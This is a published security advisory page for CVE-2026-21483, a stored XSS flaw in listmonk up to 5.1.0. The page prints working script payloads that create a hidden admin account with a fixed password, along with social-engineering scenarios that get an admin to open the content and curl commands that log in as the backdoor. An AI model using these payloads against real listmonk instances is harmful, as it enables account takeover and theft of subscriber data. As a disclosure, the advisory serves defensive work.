GHSA-JMR4-P576-V565

Vulnerability from github – Published: 2026-01-02 23:04 – Updated: 2026-01-02 23:04
VLAI?
Summary
listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover
Details

Security Advisory: Stored XSS Leading to Admin Account Takeover

Affected Versions: ≤ 5.1.0
Vulnerability Type: CWE-79: Stored Cross-Site Scripting

Summary

A lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.

The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required.

Required Attacker Permissions

campaigns:manage    - Create/edit campaigns
campaigns:get       - View campaigns  
lists:get_all       - Access lists
templates:get       - Access templates

Note: These are common permissions for content managers who are not full admins.

Attack Vectors

Vector 1: Raw HTML (Direct Script Tag)

<script>
fetch('/api/users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  credentials: 'include',
  body: '{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'
});
</script>

Vector 2: Go Template Safe Function

{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'});</script>` | Safe }}

Attack Scenarios

Scenario 1: Campaign Preview Attack

  1. Attacker creates campaign with XSS payload
  2. Request is made to super admin: "Please review my newsletter draft"
  3. Super admin opens campaign and clicks Preview
  4. XSS executes → Backdoor admin account created
  5. Attacker logs in with backdoor / Hacked123

Scenario 2: Archive Link Attack (No Click Required)

  1. Attacker creates campaign with XSS payload
  2. Attacker enables Archive for the campaign
  3. Attacker shares archive link: http://localhost:9000/archive/{uuid}
  4. Super admin visits the link (no preview click needed!)
  5. XSS executes automatically → Account takeover

Proof of Concept

Step 1: Create Malicious Campaign

As lower-privileged user, create campaign with body:

<script>
fetch('/api/users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  credentials: 'include',
  body: JSON.stringify({
    username: 'backdoor',
    email: 'backdoor@evil.com', 
    name: 'Backdoor Admin',
    password: 'Hacked123',
    type: 'user',
    status: 'enabled',
    userRoleId: 1,
    user_role_id: 1
  })
});
</script>

Step 2: Enable Archive (Optional - for link-based attack)

  1. Edit campaign settings
  2. Enable "Archive"
  3. Copy archive URL: http://localhost:9000/archive/{campaign-uuid}

Step 3: Trigger Execution

Option A - Preview: - Send campaign to super admin for "review" - Super admin previews → XSS fires

Option B - Archive Link: - Share archive URL with super admin - Super admin visits link → XSS fires automatically

Step 4: Verify Takeover

# Login as backdoor admin
curl -X POST "http://localhost:9000/admin/login" \
  -d "username=backdoor&password=Hacked123" \
  -c cookies.txt -L

# Verify super admin access
curl -b cookies.txt "http://localhost:9000/api/users"

Evidence Screenshots

[Screenshot 1: Lower-privileged user creating malicious campaign] Screenshot 2025-12-27 170259

[Screenshot 2: Super admin previewing campaign] image

[Screenshot 3: Backdoor user successfully created] Screenshot 2025-12-27 170413

Impact

Action Possible via XSS
Create backdoor admin ✅ Yes
Export all subscribers ✅ Yes
Modify SMTP settings ✅ Yes
Delete all campaigns ✅ Yes
Access API keys/secrets ✅ Yes

Affected Components

Component XSS Works? Method
Campaign body (Raw HTML) ✅ Yes Direct <script> tag
Campaign body (Template) ✅ Yes {{ \ ` | Safe }}`
Template body ✅ Yes Both methods
Campaign archive ✅ Yes Automatic execution on visit
Severity ?
5.4 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/knadh/listmonk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.1"
            },
            {
              "fixed": "6.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/knadh/listmonk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.1-0.20251231125615-74dc5a01cfbb"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-21483"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T23:04:15Z",
    "nvd_published_at": "2026-01-02T21:16:03Z",
    "severity": "MODERATE"
  },
  "details": "## Security Advisory: Stored XSS Leading to Admin Account Takeover\n\n**Affected Versions:** \u2264 5.1.0  \n**Vulnerability Type:** CWE-79: Stored Cross-Site Scripting  \n\n---\n\n## Summary\n\nA lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.\n\nThe attack can be weaponized via the **public archive feature**, where victims simply need to visit a link - no preview click required.\n\n---\n\n## Required Attacker Permissions\n\n```\ncampaigns:manage    - Create/edit campaigns\ncampaigns:get       - View campaigns  \nlists:get_all       - Access lists\ntemplates:get       - Access templates\n```\n\n**Note:** These are common permissions for content managers who are not full admins.\n\n---\n\n## Attack Vectors\n\n### Vector 1: Raw HTML (Direct Script Tag)\n\n```html\n\u003cscript\u003e\nfetch(\u0027/api/users\u0027, {\n  method: \u0027POST\u0027,\n  headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n  credentials: \u0027include\u0027,\n  body: \u0027{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}\u0027\n});\n\u003c/script\u003e\n```\n\n### Vector 2: Go Template `Safe` Function\n\n```\n{{ `\u003cscript\u003efetch(\u0027/api/users\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/json\u0027},credentials:\u0027include\u0027,body:\u0027{\"username\":\"backdoor\",\"email\":\"backdoor@evil.com\",\"name\":\"Backdoor\",\"password\":\"Hacked123\",\"type\":\"user\",\"status\":\"enabled\",\"userRoleId\":1,\"user_role_id\":1}\u0027});\u003c/script\u003e` | Safe }}\n```\n\n---\n\n## Attack Scenarios\n\n### Scenario 1: Campaign Preview Attack\n\n1. Attacker creates campaign with XSS payload\n2. Request is made to super admin: *\"Please review my newsletter draft\"*\n3. Super admin opens campaign and clicks **Preview**\n4. XSS executes \u2192 Backdoor admin account created\n5. Attacker logs in with `backdoor` / `Hacked123`\n\n### Scenario 2: Archive Link Attack (No Click Required)\n\n1. Attacker creates campaign with XSS payload\n2. Attacker enables **Archive** for the campaign\n3. Attacker shares archive link: `http://localhost:9000/archive/{uuid}`\n4. Super admin visits the link (no preview click needed!)\n5. XSS executes automatically \u2192 Account takeover\n\n---\n\n## Proof of Concept\n\n### Step 1: Create Malicious Campaign\n\nAs lower-privileged user, create campaign with body:\n```html\n\u003cscript\u003e\nfetch(\u0027/api/users\u0027, {\n  method: \u0027POST\u0027,\n  headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n  credentials: \u0027include\u0027,\n  body: JSON.stringify({\n    username: \u0027backdoor\u0027,\n    email: \u0027backdoor@evil.com\u0027, \n    name: \u0027Backdoor Admin\u0027,\n    password: \u0027Hacked123\u0027,\n    type: \u0027user\u0027,\n    status: \u0027enabled\u0027,\n    userRoleId: 1,\n    user_role_id: 1\n  })\n});\n\u003c/script\u003e\n```\n\n### Step 2: Enable Archive (Optional - for link-based attack)\n\n1. Edit campaign settings\n2. Enable \"Archive\"\n3. Copy archive URL: `http://localhost:9000/archive/{campaign-uuid}`\n\n### Step 3: Trigger Execution\n\n**Option A - Preview:**\n- Send campaign to super admin for \"review\"\n- Super admin previews \u2192 XSS fires\n\n**Option B - Archive Link:**\n- Share archive URL with super admin\n- Super admin visits link \u2192 XSS fires automatically\n\n### Step 4: Verify Takeover\n\n```bash\n# Login as backdoor admin\ncurl -X POST \"http://localhost:9000/admin/login\" \\\n  -d \"username=backdoor\u0026password=Hacked123\" \\\n  -c cookies.txt -L\n\n# Verify super admin access\ncurl -b cookies.txt \"http://localhost:9000/api/users\"\n```\n\n---\n\n## Evidence Screenshots\n\n\u003e **[Screenshot 1: Lower-privileged user creating malicious campaign]**\n\u003cimg width=\"1892\" height=\"781\" alt=\"Screenshot 2025-12-27 170259\" src=\"https://github.com/user-attachments/assets/b9af26bf-0c5b-4667-ba9a-eea774156d0b\" /\u003e\n\n\u003e **[Screenshot 2: Super admin previewing campaign]**\n\u003cimg width=\"1686\" height=\"709\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ca3d5ff-0cd9-4f22-bca0-e26e13c6b1c7\" /\u003e\n\n\u003e **[Screenshot 3: Backdoor user successfully created]**\n\u003cimg width=\"1370\" height=\"469\" alt=\"Screenshot 2025-12-27 170413\" src=\"https://github.com/user-attachments/assets/18135128-f5af-4023-9aa7-8662a1405ed2\" /\u003e\n\n---\n\n## Impact\n\n| Action | Possible via XSS |\n|--------|-----------------|\n| Create backdoor admin | \u2705 Yes |\n| Export all subscribers | \u2705 Yes |\n| Modify SMTP settings | \u2705 Yes |\n| Delete all campaigns | \u2705 Yes |\n| Access API keys/secrets | \u2705 Yes |\n\n---\n\n## Affected Components\n\n| Component | XSS Works? | Method |\n|-----------|-----------|--------|\n| Campaign body (Raw HTML) | \u2705 Yes | Direct `\u003cscript\u003e` tag |\n| Campaign body (Template) | \u2705 Yes | `{{ \\` \\` \\| Safe }}` |\n| Template body | \u2705 Yes | Both methods |\n| Campaign archive | \u2705 Yes | Automatic execution on visit |\n\n---",
  "id": "GHSA-jmr4-p576-v565",
  "modified": "2026-01-02T23:04:15Z",
  "published": "2026-01-02T23:04:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21483"
    },
    {
      "type": "WEB",
      "url": "https://github.com/knadh/listmonk/commit/74dc5a01cfbb12cf218cb33ddad8410c53e2e915"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/knadh/listmonk"
    },
    {
      "type": "WEB",
      "url": "https://github.com/knadh/listmonk/releases/tag/v6.0.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.